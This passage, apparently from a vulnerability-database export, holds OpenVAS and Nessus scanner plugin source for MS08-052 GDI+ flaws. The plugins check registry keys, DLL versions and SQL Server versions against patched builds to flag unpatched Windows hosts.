of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to crash an affected application\n or execute arbitrary code.\n Impact Level: Application\";\ntag_affected = \"Microsoft SQL Server 2005 SP 2/3\n Microsoft Office Excel Viewer 2007\n Microsoft Office XP/2003 SP 3 and prior\n Microsoft Office Visio 2002 SP 2 and prior\n Microsoft Office Groove 2007 SP1 and prior\n Microsoft Excel Viewer 2003 SP 3 and prior\n Microsoft Office 2007 System SP 1/2 and prior\n Microsoft Office Word Viewer 2003 SP 3 and prior\n Microsoft Office Visio Viewer 2007 SP 2 and prior\n Microsoft Office PowerPoint Viewer 2007 SP 2 and prior\n Microsoft Visual Studio 2008 SP 1 and prior\n Microsoft Visual Studio .NET 2003 SP 1 and prior\n Microsoft Windows 2000 SP4 with Internet Explorer 6 SP 1\n Microsoft Office Compatibility Pack for Word/Excel/PowerPoint 2007 File Formats SP 1/2\n Microsoft Office PowerPoint Viewer 2003\n Microsoft Office PowerPoint Viewer 2007 Service Pack 1\";\ntag_insight = \"The issues are caused by memory corruptions, integer, heap and buffer\n overflows, and input validation errors in GDI+ when rendering malformed WMF,\n PNG, TIFF and BMP images, or when processing Office Art Property Tables in\n Office documents.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS08-052.\";\n\nif(description)\n{\n script_id(801725);\n script_version(\"$Revision: 5362 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 13:46:39 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-18 10:00:48 +0100 (Tue, 18 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-5348\", \"CVE-2008-3012\", \"CVE-2008-3013\",\n \"CVE-2008-3014\", \"CVE-2008-3015\");\n script_bugtraq_id(31018, 31019, 31020, 31021, 31022);\n script_name(\"Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/32154\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_ms_visual_prdts_detect.nasl\",\n \"secpod_office_products_version_900032.nasl\",\n \"secpod_reg_enum.nasl\", \"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nfunction FileVer (file, path)\n{\n share = ereg_replace(pattern:\"([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n if(share =~ \"[a-z]\\$\")\n share = toupper(share);\n file = ereg_replace(pattern:\"[A-Za-z]:(.*)\", replace:\"\\1\", string:path + file);\n ver = GetVer(file:file, share:share);\n return ver;\n}\n\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\n\n# Visio 2002\n# Check for existence of Visio\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n appName = registry_get_sz(item:\"DisplayName\", key:key + item);\n if(\"Visio\" >< appName)\n {\n offPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(offPath)\n {\n offPath += \"\\Microsoft Shared\\OFFICE10\";\n dllVer = FileVer(file:\"\\Mso.dll\", path:offPath);\n if(dllVer)\n {\n # Grep for Mso.dll version 10.0 < 10.0.6844.0\n if(version_in_range(version:dllVer, test_version:\"10.0\", test_version2:\"10.0.6843.9\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n }\n}\n\n# Office XP\nif(get_kb_item(\"MS/Office/Ver\") =~ \"^10\\..*\")\n{\n offPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(offPath)\n {\n offPath += \"\\Microsoft Shared\\OFFICE10\";\n dllVer = FileVer(file:\"\\Mso.dll\", path:offPath);\n if(dllVer)\n {\n # Grep for Mso.dll version 10.0 < 10.0.6845.0\n if(version_in_range(version:dllVer, test_version:\"10.0\", test_version2:\"10.0.6844.9\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n\n# Office 2003 or Excel Viewer 2003 or Word Viewer 2003 or PowerPoint Viewer 2003\noffPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"ProgramFilesDir\");\nif(offPath)\n{\n offPath = offPath + \"\\Microsoft Office\\OFFICE11\";\n\n dllVer = FileVer(file:\"\\Gdiplus.dll\", path:offPath);\n if(dllVer)\n {\n # Grep for Gdiplus.dll version 11.0 < 11.0.8230.0\n if(version_in_range(version:dllVer, test_version:\"11.0\", test_version2:\"11.0.8229.9\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n\n# Office 2007 or Groove 2007 or Excel Viewer or PowerPoint Viewer or\n# Office Compatibility Pack 2007 or Visio Viewer 2007\nif(((get_kb_item(\"MS/Office/Ver\") =~ \"^12\\..*\") ||\n (get_kb_item(\"SMB/Office/VisioViewer/Ver\") =~ \"^12\\..*\") ||\n (get_kb_item(\"SMB/Office/Groove/Version\") =~ \"^12\\..*\") ||\n (get_kb_item(\"SMB/Office/XLView/Version\") =~ \"^12\\..*\") ||\n (get_kb_item(\"SMB/Office/PPView/Version\")) =~ \"^12\\..*\")||\n (get_kb_item(\"SMB/Office/ComptPack/Version\") =~ \"^12\\..*\"))\n{\n offPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(offPath)\n {\n offPath += \"\\Microsoft Shared\\OFFICE12\";\n dllVer = FileVer(file:\"\\Ogl.dll\", path:offPath);\n if(dllVer)\n {\n # Grep for Ogl.dll version 12.0 < 12.0.6509.5000\n if(version_in_range(version:dllVer, test_version:\"12.0\", test_version2:\"12.0.6509.4999\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n\n# Microsoft Visual Studio .Net 2003 and Microsoft Visual Studio .Net 2002\nif(egrep(pattern:\"^7\\..*\", string:get_kb_item(\"Microsoft/VisualStudio.Net/Ver\")))\n{\n vsPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(vsPath)\n {\n vsPath = vsPath + \"\\Microsoft Shared\\Office10\";\n vsVer = FileVer(file:\"\\MSO.DLL\", path:vsPath);\n # Check for MSO.dll version 10.0 < 10.0.6844.0\n if(vsVer)\n {\n if(version_in_range(version:vsVer, test_version:\"10.0\", test_version2:\"10.0.6843.9\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n\n# Visual Studio 2008\nif(egrep(pattern:\"^9\\..*\", string:get_kb_item(\"Microsoft/VisualStudio/Ver\")))\n{\n vsPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Microsoft SDKs\\Windows\",\n item:\"CurrentInstallFolder\");\n if(vsPath)\n {\n vsPath = vsPath + \"\\Bootstrapper\\Packages\\ReportViewer\";\n rvVer = FileVer(file:\"\\ReportViewer.exe\", path:vsPath);\n # Check for ReportViewer.exe 9.0 < 9.0.21022.143\n if(rvVer)\n {\n if(version_in_range(version:rvVer, test_version:\"9.0\", test_version2:\"9.0.21022.142\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n\n# Windows 2K with IE 6 SP1\nif(hotfix_check_sp(win2k:5) > 0)\n{\n ieVer = get_kb_item(\"MS/IE/EXE/Ver\");\n if(ieVer =~ \"^6\\.0\\.2800\")\n {\n dllPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(dllPath)\n {\n dllPath += \"\\Microsoft Shared\\VGX\";\n dllVer = FileVer(file:\"\\vgx.dll\", path:dllPath);\n if(dllVer)\n {\n # Grep for vgx.dll version < 6.0.2800.1612\n if(version_is_less(version:dllVer, test_version:\"6.0.2800.1612\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n }\n}\n\n# Microsoft SQL Server 2005\nkey = \"SOFTWARE\\Microsoft\\Microsoft SQL Server\\\";\nif(registry_key_exists(key:key))\n{\n foreach item (registry_enum_keys(key:key))\n {\n sqlpath = registry_get_sz(key:key + item + \"\\Setup\", item:\"SQLBinRoot\");\n sqlVer = FileVer (file:\"\\sqlservr.exe\", path:sqlpath);\n # Check for SQL Server 2005 version 2005.90.3000 < 2005.90.3073.0\n if(sqlVer)\n {\n if(version_in_range(version:sqlVer, test_version:\"2005.90.3000\", test_version2:\"2005.90.3072.9\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:04:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3013", "CVE-2008-3015", "CVE-2008-3014", "CVE-2008-3012", "CVE-2007-5348"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS08-052.", "modified": "2020-01-07T00:00:00", "published": "2011-01-18T00:00:00", "id": "OPENVAS:1361412562310801725", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801725", "type": "openvas", "title": "Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft GDI Plus Remote Code Execution Vulnerabilities (954593)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801725\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-01-18 10:00:48 +0100 (Tue, 18 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-5348\", \"CVE-2008-3012\", \"CVE-2008-3013\",\n \"CVE-2008-3014\", \"CVE-2008-3015\");\n script_bugtraq_id(31018, 31019, 31020, 31021, 31022);\n script_name(\"Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593)\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-052\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_ms_visual_prdts_detect.nasl\", \"secpod_office_products_version_900032.nasl\",\n \"smb_reg_service_pack.nasl\", \"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to crash an affected application\n or execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft SQL Server 2005 SP 2/3\n\n - Microsoft Office Excel Viewer 2007\n\n - Microsoft Office XP/2003 SP 3 and prior\n\n - Microsoft Office Visio 2002 SP 2 and prior\n\n - Microsoft Office Groove 2007 SP1 and prior\n\n - Microsoft Excel Viewer 2003 SP 3 and prior\n\n - Microsoft Office 2007 System SP 1/2 and prior\n\n - Microsoft Office Word Viewer 2003 SP 3 and prior\n\n - Microsoft Office Visio Viewer 2007 SP 2 and prior\n\n - Microsoft Office PowerPoint Viewer 2007 SP 2 and prior\n\n - Microsoft Visual Studio 2008 SP 1 and prior\n\n - Microsoft Visual Studio .NET 2003 SP 1 and prior\n\n - Microsoft Windows 2000 SP4 with Internet Explorer 6 SP 1\n\n - Microsoft Office Compatibility Pack for Word/Excel/PowerPoint 2007 File Formats SP 1/2\n\n - Microsoft Office PowerPoint Viewer 2003\n\n - Microsoft Office PowerPoint Viewer 2007 Service Pack 1\");\n\n script_tag(name:\"insight\", value:\"The issues are caused by memory corruptions, integer, heap and buffer\n overflows, and input validation errors in GDI+ when rendering malformed WMF,\n PNG, TIFF and BMP images, or when processing Office Art Property Tables in\n Office documents.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS08-052.\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nfunction FileVer (file, path)\n{\n share = ereg_replace(pattern:\"([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n if(share =~ \"[a-z]\\$\")\n share = toupper(share);\n file = ereg_replace(pattern:\"[A-Za-z]:(.*)\", replace:\"\\1\", string:path + file);\n ver = GetVer(file:file, share:share);\n return ver;\n}\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\n# Visio 2002\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n appName = registry_get_sz(item:\"DisplayName\", key:key + item);\n if(\"Visio\" >< appName)\n {\n offPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\", item:\"CommonFilesDir\");\n if(offPath)\n {\n offPath += \"\\Microsoft Shared\\OFFICE10\";\n dllVer = FileVer(file:\"\\Mso.dll\", path:offPath);\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"10.0\", test_version2:\"10.0.6843.9\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n }\n}\n\nofficeVer = get_kb_item(\"MS/Office/Ver\");\n\n# Office XP\nif(officeVer && officeVer =~ \"^10\\.\")\n{\n offPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\", item:\"CommonFilesDir\");\n if(offPath)\n {\n offPath += \"\\Microsoft Shared\\OFFICE10\";\n dllVer = FileVer(file:\"\\Mso.dll\", path:offPath);\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"10.0\", test_version2:\"10.0.6844.9\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n\n# Office 2003 or Excel Viewer 2003 or Word Viewer 2003 or PowerPoint Viewer 2003\noffPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"ProgramFilesDir\");\nif(offPath)\n{\n offPath = offPath + \"\\Microsoft Office\\OFFICE11\";\n\n dllVer = FileVer(file:\"\\Gdiplus.dll\", path:offPath);\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"11.0\", test_version2:\"11.0.8229.9\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nvisioViewVer = get_kb_item(\"SMB/Office/VisioViewer/Ver\");\ngrooveVer = get_kb_item(\"SMB/Office/Groove/Version\");\nxlViewVer = get_kb_item(\"SMB/Office/XLView/Version\");\nppViewVer = get_kb_item(\"SMB/Office/PPView/Version\");\ncptPackVer = get_kb_item(\"SMB/Office/ComptPack/Version\");\n\n# Office 2007 or Groove 2007 or Excel Viewer or PowerPoint Viewer or\n# Office Compatibility Pack 2007 or Visio Viewer 2007\nif((officeVer && officeVer =~ \"^12\\.\") ||\n (visioViewVer && visioViewVer =~ \"^12\\.\") ||\n (grooveVer && grooveVer =~ \"^12\\.\") ||\n (xlViewVer && xlViewVer =~ \"^12\\.\") ||\n (ppViewVer && ppViewVer =~ \"^12\\.\") ||\n (cptPackVer && cptPackVer =~ \"^12\\.\"))\n{\n offPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\", item:\"CommonFilesDir\");\n if(offPath)\n {\n offPath += \"\\Microsoft Shared\\OFFICE12\";\n dllVer = FileVer(file:\"\\Ogl.dll\", path:offPath);\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"12.0\", test_version2:\"12.0.6509.4999\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n\nvisStudNetVer = get_kb_item(\"Microsoft/VisualStudio.Net/Ver\");\n\n# Microsoft Visual Studio .Net 2003 and Microsoft Visual Studio .Net 2002\nif(visStudNetVer && visStudNetVer =~ \"^7\\.\")\n{\n vsPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\", item:\"CommonFilesDir\");\n if(vsPath)\n {\n vsPath = vsPath + \"\\Microsoft Shared\\Office10\";\n vsVer = FileVer(file:\"\\MSO.DLL\", path:vsPath);\n if(vsVer)\n {\n if(version_in_range(version:vsVer, test_version:\"10.0\", test_version2:\"10.0.6843.9\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n\nvisStudVer = get_kb_item(\"Microsoft/VisualStudio/Ver\");\n\n# Visual Studio 2008\nif(visStudVer && visStudVer =~ \"^9\\.\")\n{\n vsPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Microsoft SDKs\\Windows\", item:\"CurrentInstallFolder\");\n if(vsPath)\n {\n vsPath = vsPath + \"\\Bootstrapper\\Packages\\ReportViewer\";\n rvVer = FileVer(file:\"\\ReportViewer.exe\", path:vsPath);\n if(rvVer)\n {\n if(version_in_range(version:rvVer, test_version:\"9.0\", test_version2:\"9.0.21022.142\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n\nif(hotfix_check_sp(win2k:5) > 0)\n{\n ieVer = get_kb_item(\"MS/IE/EXE/Ver\");\n if(ieVer && ieVer =~ \"^6\\.0\\.2800\")\n {\n dllPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\", item:\"CommonFilesDir\");\n if(dllPath)\n {\n dllPath += \"\\Microsoft Shared\\VGX\";\n dllVer = FileVer(file:\"\\vgx.dll\", path:dllPath);\n if(dllVer)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.2800.1612\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n }\n}\n\n# Microsoft SQL Server 2005\nkey = \"SOFTWARE\\Microsoft\\Microsoft SQL Server\\\";\nif(registry_key_exists(key:key))\n{\n foreach item (registry_enum_keys(key:key))\n {\n sqlpath = registry_get_sz(key:key + item + \"\\Setup\", item:\"SQLBinRoot\");\n sqlVer = FileVer (file:\"\\sqlservr.exe\", path:sqlpath);\n if(sqlVer)\n {\n if(version_in_range(version:sqlVer, test_version:\"2005.90.3000\", test_version2:\"2005.90.3072.9\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-01T06:14:41", "description": "The remote host is running a version of Windows that has multiple\nbuffer overflow vulnerabilities when viewing VML, EMF, GIF, WMF and\nBMP files that could allow an attacker to execute arbitrary code on\nthe remote host.\n\nTo exploit these flaws, an attacker would need to send a malformed\nimage file to a user on the remote host and wait for the user to\nopen it using an affected Microsoft application.", "edition": 25, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-24T00:00:00", "title": "MS08-052: Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593) (uncredentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3013", "CVE-2008-3015", "CVE-2008-3014", "CVE-2008-3012", "CVE-2007-5348"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:microsoft:sql_server"], "id": "SMB_KB954593.NASL", "href": "https://www.tenable.com/plugins/nessus/106298", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106298);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\n \"CVE-2007-5348\",\n \"CVE-2008-3012\",\n \"CVE-2008-3013\",\n \"CVE-2008-3014\",\n \"CVE-2008-3015\"\n );\n script_bugtraq_id(\n 31018,\n 31019,\n 31020,\n 31021,\n 31022\n );\n script_xref(name:\"MSFT\", value:\"MS08-052\");\n script_xref(name:\"MSKB\", value:\"938464\");\n script_xref(name:\"MSKB\", value:\"954326\");\n script_xref(name:\"MSKB\", value:\"954478\");\n script_xref(name:\"MSKB\", value:\"954479\");\n script_xref(name:\"MSKB\", value:\"954606\");\n\n script_name(english:\"MS08-052: Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593) (uncredentialed check)\");\n script_summary(english:\"Checks the version of MSSQL\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple arbitrary execution flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Windows that has multiple\nbuffer overflow vulnerabilities when viewing VML, EMF, GIF, WMF and\nBMP files that could allow an attacker to execute arbitrary code on\nthe remote host.\n\nTo exploit these flaws, an attacker would need to send a malformed\nimage file to a user on the remote host and wait for the user to\nopen it using an affected Microsoft application.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-052\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for SQL Server 2000 and\n2005.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/24\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sql_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mssqlserver_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(1433, \"Services/mssql\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_service(svc:\"mssql\", exit_on_fail:TRUE);\n\nver = get_kb_item(\"MSSQL/\" + port + \"/Version\");\nif (!ver) audit(AUDIT_SERVICE_VER_FAIL,\"MSSQL\", port);\n\nv = split(ver, sep:\".\", keep:FALSE);\nfor (i=0; i < max_index(v); i++)\n v[i] = int(v[i]);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\npcidss = get_kb_item(\"Settings/PCI_DSS\");\n\nvuln = 0;\n\nif (pcidss && (v[0] == 8 && v[1] == 0 && v[2] < 534)) # 2000 < SP2\n{\n vuln++;\n fix = \"8.0.1062\";\n}\nelse if (v[0] == 8 && v[1] == 0 && (v[2] >= 1038 && v[2] < 1062)) # 2000 SP2\n{\n vuln++;\n fix = \"8.0.1062\";\n}\nelse if (pcidss && (v[0] == 9 && v[1] == 0 && v[2] < 3042)) # 2005 < SP2 \n{\n vuln++;\n fix = \"9.0.3072\";\n}\nelse if (v[0] == 9 && v[1] == 0 && (v[2] >= 3000 && v[2] < 3072)) # 2005 SP2 GDR\n{\n vuln++;\n fix = \"9.0.3072\";\n}\nelse if (v[0] == 9 && v[1] == 0 && (v[2] >= 3200 && v[2] < 3281))\n{\n vuln++;\n fix = \"9.0.3281\";\n}\nif(vuln > 0)\n{\n report = '\\n Installed Version : ' + ver;\n report +='\\n Fixed Version : ' + fix +'\\n';\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:report);\n}\nelse \n audit(AUDIT_INST_VER_NOT_VULN, \"MSSQL\", ver);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:14:50", "description": "The remote host is running a version of Windows that has multiple\nbuffer overflow vulnerabilities when viewing VML, EMF, GIF, WMF and\nBMP files that could allow an attacker to execute arbitrary code on\nthe remote host.\n\nTo exploit these flaws, an attacker would need to send a malformed\nimage file to a user on the remote host and wait for him to open it\nusing an affected Microsoft application.", "edition": 27, "published": "2008-09-10T00:00:00", "title": "MS08-052: Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3013", "CVE-2008-3015", "CVE-2008-3014", "CVE-2008-3012", "CVE-2007-5348"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS08-052.NASL", "href": "https://www.tenable.com/plugins/nessus/34120", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34120);\n script_version(\"1.40\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2007-5348\",\n \"CVE-2008-3012\",\n \"CVE-2008-3013\",\n \"CVE-2008-3014\",\n \"CVE-2008-3015\"\n );\n script_bugtraq_id(31018, 31019, 31020, 31021, 31022);\n script_xref(name:\"MSFT\", value:\"MS08-052\");\n script_xref(name:\"MSKB\", value:\"938464\");\n script_xref(name:\"MSKB\", value:\"954326\");\n script_xref(name:\"MSKB\", value:\"954478\");\n script_xref(name:\"MSKB\", value:\"954479\");\n script_xref(name:\"MSKB\", value:\"954606\");\n\n script_name(english:\"MS08-052: Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)\");\n script_summary(english:\"Determines the presence of update 954593\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through the\nMicrosoft GDI rendering engine.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Windows that has multiple\nbuffer overflow vulnerabilities when viewing VML, EMF, GIF, WMF and\nBMP files that could allow an attacker to execute arbitrary code on\nthe remote host.\n\nTo exploit these flaws, an attacker would need to send a malformed\nimage file to a user on the remote host and wait for him to open it\nusing an affected Microsoft application.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-052\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003,\nVista and 2008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/09\");\n 